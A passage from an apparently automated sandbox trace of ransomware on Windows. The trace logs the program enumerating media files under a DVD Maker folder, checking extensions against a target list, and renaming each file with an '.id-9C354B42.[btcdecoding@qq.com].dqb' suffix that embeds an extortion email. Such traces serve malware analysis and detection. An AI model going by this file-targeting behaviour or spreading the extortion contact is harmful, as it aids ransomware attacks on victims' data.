Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.092] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.092] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.092] lstrlenW (lpString=".doc") returned 4 [0272.092] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.092] lstrlenW (lpString=".docx") returned 5 [0272.092] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0272.092] lstrlenW (lpString=".pdf") returned 4 [0272.092] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.092] lstrlenW (lpString=".xls") returned 4 [0272.092] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.092] lstrlenW (lpString=".xlsx") returned 5 [0272.092] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0272.092] lstrlenW (lpString=".ppt") returned 4 [0272.092] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.092] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.092] lstrlenW (lpString=".zip") returned 4 [0272.092] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.092] lstrlenW (lpString=".rar") returned 4 [0272.092] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.092] lstrlenW (lpString=".bz2") returned 4 [0272.092] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.092] lstrlenW (lpString=".7z") returned 3 [0272.092] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.092] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.093] lstrlenW (lpString=".dbf") returned 4 [0272.093] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.093] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.093] lstrlenW (lpString=".1cd") returned 4 [0272.093] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.093] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.093] lstrlenW (lpString=".jpg") returned 4 [0272.093] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.093] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.093] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.093] lstrlenW (lpString=".doc") returned 4 [0272.093] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.093] lstrlenW (lpString=".docx") returned 5 [0272.093] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0272.093] lstrlenW (lpString=".pdf") returned 4 [0272.093] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.093] lstrlenW (lpString=".xls") returned 4 [0272.093] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.093] lstrlenW (lpString=".xlsx") returned 5 [0272.093] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0272.093] lstrlenW (lpString=".ppt") returned 4 [0272.093] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.093] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.093] lstrlenW (lpString=".zip") returned 4 [0272.093] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.093] lstrlenW (lpString=".rar") returned 4 [0272.093] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.093] lstrlenW (lpString=".bz2") returned 4 [0272.093] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.093] lstrlenW (lpString=".7z") returned 3 [0272.093] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.093] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.093] lstrlenW (lpString=".dbf") returned 4 [0272.094] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.094] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.094] lstrlenW (lpString=".1cd") returned 4 [0272.094] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.094] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0272.094] lstrlenW (lpString=".jpg") returned 4 [0272.094] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.094] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0272.094] lstrlenW (lpString="SportsMainBackground_PAL.wmv") returned 28 [0272.094] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.094] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=5749696) returned 1 [0272.094] CloseHandle (hObject=0x31c) returned 1 [0272.094] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv")) returned 0x20 [0272.094] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.094] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.094] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.094] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.094] lstrlenW (lpString=".doc") returned 4 [0272.095] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.095] lstrlenW (lpString=".docx") returned 5 [0272.095] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0272.095] lstrlenW (lpString=".pdf") returned 4 [0272.095] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.095] lstrlenW (lpString=".xls") returned 4 [0272.095] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.095] lstrlenW (lpString=".xlsx") returned 5 [0272.095] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0272.095] lstrlenW (lpString=".ppt") returned 4 [0272.095] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.095] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.095] lstrlenW (lpString=".zip") returned 4 [0272.095] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.095] lstrlenW (lpString=".rar") returned 4 [0272.095] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.095] lstrlenW (lpString=".bz2") returned 4 [0272.095] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.095] lstrlenW (lpString=".7z") returned 3 [0272.095] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.095] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.095] lstrlenW (lpString=".dbf") returned 4 [0272.095] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.095] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.095] lstrlenW (lpString=".1cd") returned 4 [0272.095] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.095] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.095] lstrlenW (lpString=".jpg") returned 4 [0272.095] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.096] lstrlenW (lpString=".doc") returned 4 [0272.096] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.096] lstrlenW (lpString=".docx") returned 5 [0272.096] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0272.096] lstrlenW (lpString=".pdf") returned 4 [0272.096] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.096] lstrlenW (lpString=".xls") returned 4 [0272.096] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.096] lstrlenW (lpString=".xlsx") returned 5 [0272.096] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0272.096] lstrlenW (lpString=".ppt") returned 4 [0272.096] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.096] lstrlenW (lpString=".zip") returned 4 [0272.096] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.096] lstrlenW (lpString=".rar") returned 4 [0272.096] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.096] lstrlenW (lpString=".bz2") returned 4 [0272.096] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.096] lstrlenW (lpString=".7z") returned 3 [0272.096] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.096] lstrlenW (lpString=".dbf") returned 4 [0272.096] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.096] lstrlenW (lpString=".1cd") returned 4 [0272.096] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0272.096] lstrlenW (lpString=".jpg") returned 4 [0272.096] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.097] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0272.097] lstrlenW (lpString="SportsMainToNotesBackground.wmv") returned 31 [0272.097] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.097] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=1829606) returned 1 [0272.097] CloseHandle (hObject=0x31c) returned 1 [0272.097] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv")) returned 0x20 [0272.097] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.097] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.097] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.097] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.097] lstrlenW (lpString=".doc") returned 4 [0272.097] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.097] lstrlenW (lpString=".docx") returned 5 [0272.097] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0272.097] lstrlenW (lpString=".pdf") returned 4 [0272.097] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.097] lstrlenW (lpString=".xls") returned 4 [0272.097] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.097] lstrlenW (lpString=".xlsx") returned 5 [0272.098] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0272.098] lstrlenW (lpString=".ppt") returned 4 [0272.098] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.098] lstrlenW (lpString=".zip") returned 4 [0272.098] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.098] lstrlenW (lpString=".rar") returned 4 [0272.098] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.098] lstrlenW (lpString=".bz2") returned 4 [0272.098] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.098] lstrlenW (lpString=".7z") returned 3 [0272.098] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.098] lstrlenW (lpString=".dbf") returned 4 [0272.098] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.098] lstrlenW (lpString=".1cd") returned 4 [0272.098] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.098] lstrlenW (lpString=".jpg") returned 4 [0272.098] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.098] lstrlenW (lpString=".doc") returned 4 [0272.098] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.098] lstrlenW (lpString=".docx") returned 5 [0272.098] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0272.098] lstrlenW (lpString=".pdf") returned 4 [0272.098] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.098] lstrlenW (lpString=".xls") returned 4 [0272.098] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.098] lstrlenW (lpString=".xlsx") returned 5 [0272.099] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0272.099] lstrlenW (lpString=".ppt") returned 4 [0272.099] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.099] lstrlenW (lpString=".zip") returned 4 [0272.099] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.099] lstrlenW (lpString=".rar") returned 4 [0272.099] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.099] lstrlenW (lpString=".bz2") returned 4 [0272.099] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.099] lstrlenW (lpString=".7z") returned 3 [0272.099] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.099] lstrlenW (lpString=".dbf") returned 4 [0272.099] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.099] lstrlenW (lpString=".1cd") returned 4 [0272.099] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0272.099] lstrlenW (lpString=".jpg") returned 4 [0272.099] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.099] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0272.099] lstrlenW (lpString="SportsMainToNotesBackground_PAL.wmv") returned 35 [0272.099] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.100] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=1837606) returned 1 [0272.100] CloseHandle (hObject=0x31c) returned 1 [0272.100] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv")) returned 0x20 [0272.100] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.100] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.100] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.100] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.100] lstrlenW (lpString=".doc") returned 4 [0272.100] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.101] lstrlenW (lpString=".docx") returned 5 [0272.101] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0272.101] lstrlenW (lpString=".pdf") returned 4 [0272.101] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.101] lstrlenW (lpString=".xls") returned 4 [0272.101] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.101] lstrlenW (lpString=".xlsx") returned 5 [0272.101] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0272.101] lstrlenW (lpString=".ppt") returned 4 [0272.101] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.101] lstrlenW (lpString=".zip") returned 4 [0272.101] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.101] lstrlenW (lpString=".rar") returned 4 [0272.101] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.101] lstrlenW (lpString=".bz2") returned 4 [0272.101] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.101] lstrlenW (lpString=".7z") returned 3 [0272.101] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.101] lstrlenW (lpString=".dbf") returned 4 [0272.101] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.101] lstrlenW (lpString=".1cd") returned 4 [0272.101] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.101] lstrlenW (lpString=".jpg") returned 4 [0272.101] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.101] lstrlenW (lpString=".doc") returned 4 [0272.101] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.102] lstrlenW (lpString=".docx") returned 5 [0272.102] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0272.102] lstrlenW (lpString=".pdf") returned 4 [0272.102] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.102] lstrlenW (lpString=".xls") returned 4 [0272.102] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.102] lstrlenW (lpString=".xlsx") returned 5 [0272.102] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0272.102] lstrlenW (lpString=".ppt") returned 4 [0272.102] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.102] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.102] lstrlenW (lpString=".zip") returned 4 [0272.102] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.102] lstrlenW (lpString=".rar") returned 4 [0272.102] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.102] lstrlenW (lpString=".bz2") returned 4 [0272.102] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.102] lstrlenW (lpString=".7z") returned 3 [0272.102] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.102] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.102] lstrlenW (lpString=".dbf") returned 4 [0272.102] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.102] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.102] lstrlenW (lpString=".1cd") returned 4 [0272.102] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.102] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0272.102] lstrlenW (lpString=".jpg") returned 4 [0272.102] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.103] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0272.103] lstrlenW (lpString="SportsMainToScenesBackground.wmv") returned 32 [0272.103] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.103] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=1589606) returned 1 [0272.103] CloseHandle (hObject=0x31c) returned 1 [0272.103] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv")) returned 0x20 [0272.103] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.103] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.103] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0272.103] lstrlenW (lpString="C:\\Program Files\\DVD 